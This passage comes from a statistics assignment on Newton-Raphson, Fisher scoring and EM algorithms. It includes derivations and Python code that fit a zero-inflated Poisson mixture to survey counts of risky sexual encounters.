(c) Implement the Newton-Raphson and Fisher scoring methods for this problem,

provide MLEs, and compare the implementation ease and performance of the two

methods.

(d) Estimate standard errors for the MLEs for α1 and α2.

2. (20 points) The dataset trivariatenormal.dat contains 50 trivariate data points drawn

from the N3(µ,Σ) distribution. Some data points have missing values in one or more

coordinates. Only 27 of the 50 observations are complete.

(a) Derive the EM algorithm for joint maximum likelihood estimation of µ and Σ.

(b) Determine the MLEs from a suitable starting point.
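
For orientation, the standard EM iteration for a multivariate normal with missing coordinates can be sketched as follows. This is a sketch under stated assumptions, not a prescribed solution: it assumes the missingness is ignorable, and the symbols o and m (observed and missing coordinates of observation i), \hat{x}_i, C_i, and the iteration index t are notation introduced here. Here n = 50.

```latex
% Sketch: x_i = (x_{i,o}, x_{i,m}); the split into o and m depends on i.
\begin{align*}
\text{E-step:}\quad
\hat{x}_{i,m} &= \mu_m^{(t)} + \Sigma_{mo}^{(t)} \bigl(\Sigma_{oo}^{(t)}\bigr)^{-1} \bigl(x_{i,o} - \mu_o^{(t)}\bigr),
\qquad \hat{x}_{i,o} = x_{i,o}, \\
C_{i,mm} &= \Sigma_{mm}^{(t)} - \Sigma_{mo}^{(t)} \bigl(\Sigma_{oo}^{(t)}\bigr)^{-1} \Sigma_{om}^{(t)},
\qquad \text{all other blocks of } C_i \text{ equal to } 0, \\
\text{M-step:}\quad
\mu^{(t+1)} &= \frac{1}{n} \sum_{i=1}^{n} \hat{x}_i, \\
\Sigma^{(t+1)} &= \frac{1}{n} \sum_{i=1}^{n} \Bigl[ \bigl(\hat{x}_i - \mu^{(t+1)}\bigr)\bigl(\hat{x}_i - \mu^{(t+1)}\bigr)^{\top} + C_i \Bigr].
\end{align*}
```

One plausible starting point is the sample mean and covariance of the 27 complete observations.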

3. (40 points) Epidemiologists are interested in studying the sexual behavior of individuals

at risk for HIV infection. Suppose 1500 gay men were surveyed and each was asked

how many risky sexual encounters he had in the previous 30 days. Let n_i denote the

number of respondents reporting i encounters, for i = 0, ..., 16. Table 1 summarizes

the responses.

Table 1: Frequencies of respondents reporting number of risky sexual encounters

Encounters, i       0    1    2    3    4    5    6    7    8
Frequencies, n_i  379  299  222  145  109   95   73   59   45

Encounters, i       9   10   11   12   13   14   15   16
Frequencies, n_i   30   24   12    4    2    0    1    1

(a) Show that these data are poorly fitted by a Poisson model.
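
One way to check the Poisson fit numerically is sketched below. It compares the sample mean with the sample variance (equal under a Poisson model) and computes a Pearson chi-square statistic against Poisson(mean). The pooling rule for small expected counts and the helper name poisson_pmf are choices made for this illustration, not part of the assignment.

```python
import math

# Frequencies n_i for i = 0..16, copied from Table 1.
counts = [379, 299, 222, 145, 109, 95, 73, 59, 45, 30, 24, 12, 4, 2, 0, 1, 1]
N = sum(counts)

# Sample mean (the Poisson MLE of the rate) and sample variance.
mean = sum(i * n for i, n in enumerate(counts)) / N
var = sum(n * (i - mean) ** 2 for i, n in enumerate(counts)) / N


def poisson_pmf(i, rate):
    """Poisson probability of count i, computed on the log scale."""
    return math.exp(-rate + i * math.log(rate) - math.lgamma(i + 1))


# Expected counts under Poisson(mean); the last cell absorbs the tail i >= 16.
probs = [poisson_pmf(i, mean) for i in range(16)]
probs.append(1.0 - sum(probs))
expected = [N * p for p in probs]

# Pool right-tail cells until the last expected count is at least 5
# (a common rule of thumb, assumed here).
obs, exp = list(counts), list(expected)
while len(exp) > 2 and exp[-1] < 5.0:
    tail_e, tail_o = exp.pop(), obs.pop()
    exp[-1] += tail_e
    obs[-1] += tail_o

chi2 = sum((o - e) ** 2 / e for o, e in zip(obs, exp))
dof = len(exp) - 2  # cells minus 1, minus 1 estimated parameter

print(f"mean = {mean:.3f}, variance = {var:.3f}")
print(f"observed zeros = {counts[0]}, expected zeros = {expected[0]:.1f}")
print(f"Pearson chi-square = {chi2:.1f} on {dof} degrees of freedom")
```

The mean is about 2.70 while the variance is about 7.85, and the observed number of zeros far exceeds the Poisson expectation. Both point to overdispersion.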

(b) It is more realistic to assume that the respondents comprise three groups. First

there is a group of people who, for whatever reason, report zero risky encounters

even if this is not true. Suppose a respondent has probability α of belonging to

this group. With probability β, a respondent belongs to a second group representing

typical behavior. Such people respond truthfully, and their numbers of risky

encounters are assumed to follow a Poisson(µ) distribution. Finally, with probability

1 − α − β, a respondent belongs to a high-risk group. Such people respond

truthfully, and their numbers of risky encounters are assumed to follow a Poisson(λ)

distribution. The parameters in the model are α, β, µ, λ. Write the likelihood of

the observed data.
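
As a hedged sketch of the form the answer takes, the three-group description above implies a mixture probability for each reported count. The symbols \pi_i and \theta = (\alpha, \beta, \mu, \lambda) are shorthand introduced here, and the multinomial constant is dropped.

```latex
\begin{align*}
\pi_i(\theta) &= \alpha\,\mathbf{1}\{i = 0\}
  + \beta\,\frac{e^{-\mu}\mu^{i}}{i!}
  + (1-\alpha-\beta)\,\frac{e^{-\lambda}\lambda^{i}}{i!},
  \qquad i = 0, \ldots, 16, \\
L(\theta \mid n_0, \ldots, n_{16}) &\propto \prod_{i=0}^{16} \pi_i(\theta)^{n_i}.
\end{align*}
```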

(c) The observed data are n_0, ..., n_{16}. The complete data may be construed to be

n_{z,0}, n_{t,0}, ..., n_{t,16} and n_{p,0}, ..., n_{p,16}, where n_{k,i} denotes the number of respondents

in group k reporting i risky encounters and k = z, t, and p correspond to the zero,

typical, and promiscuous (high-risk) groups, respectively. Derive the updates for the EM

algorithm.

(d) Estimate the parameters of the model using the observed data.
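
A minimal EM sketch for this mixture is given below. The starting values, the convergence tolerance, and the function names (cell_probs, log_lik, em_step) are assumptions chosen for illustration. The E-step splits each observed count n_i into expected group counts, and the M-step re-estimates the parameters from those expected counts.

```python
import math

# Frequencies n_i for i = 0..16, copied from Table 1.
counts = [379, 299, 222, 145, 109, 95, 73, 59, 45, 30, 24, 12, 4, 2, 0, 1, 1]
N = sum(counts)


def poisson_pmf(i, rate):
    """Poisson probability of count i, computed on the log scale."""
    return math.exp(-rate + i * math.log(rate) - math.lgamma(i + 1))


def cell_probs(alpha, beta, mu, lam):
    """Mixture probability of each reported count i = 0..16."""
    probs = []
    for i in range(len(counts)):
        p = beta * poisson_pmf(i, mu) + (1 - alpha - beta) * poisson_pmf(i, lam)
        if i == 0:
            p += alpha  # the zero group always reports 0
        probs.append(p)
    return probs


def log_lik(theta):
    """Observed-data log-likelihood, up to an additive constant."""
    return sum(n * math.log(p) for n, p in zip(counts, cell_probs(*theta)))


def em_step(theta):
    alpha, beta, mu, lam = theta
    pi = cell_probs(alpha, beta, mu, lam)
    # E-step: expected counts in each group given the current parameters.
    n_zero = counts[0] * alpha / pi[0]
    n_typ = [n * beta * poisson_pmf(i, mu) / p
             for i, (n, p) in enumerate(zip(counts, pi))]
    n_high = [n * (1 - alpha - beta) * poisson_pmf(i, lam) / p
              for i, (n, p) in enumerate(zip(counts, pi))]
    # M-step: group proportions and weighted Poisson means.
    alpha_new = n_zero / N
    beta_new = sum(n_typ) / N
    mu_new = sum(i * x for i, x in enumerate(n_typ)) / sum(n_typ)
    lam_new = sum(i * x for i, x in enumerate(n_high)) / sum(n_high)
    return (alpha_new, beta_new, mu_new, lam_new)


theta = (0.3, 0.4, 2.0, 5.0)  # assumed starting values
trace = [log_lik(theta)]
for _ in range(5000):
    theta = em_step(theta)
    trace.append(log_lik(theta))
    if trace[-1] - trace[-2] < 1e-10:  # assumed tolerance
        break

alpha_hat, beta_hat, mu_hat, lam_hat = theta
print(f"alpha = {alpha_hat:.4f}, beta = {beta_hat:.4f}, "
      f"mu = {mu_hat:.4f}, lambda = {lam_hat:.4f}")
print(f"log-likelihood = {trace[-1]:.4f} after {len(trace) - 1} iterations")
```

Because EM can converge to a local maximum, it is worth rerunning from several starting points and checking that the log-likelihood trace never decreases.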
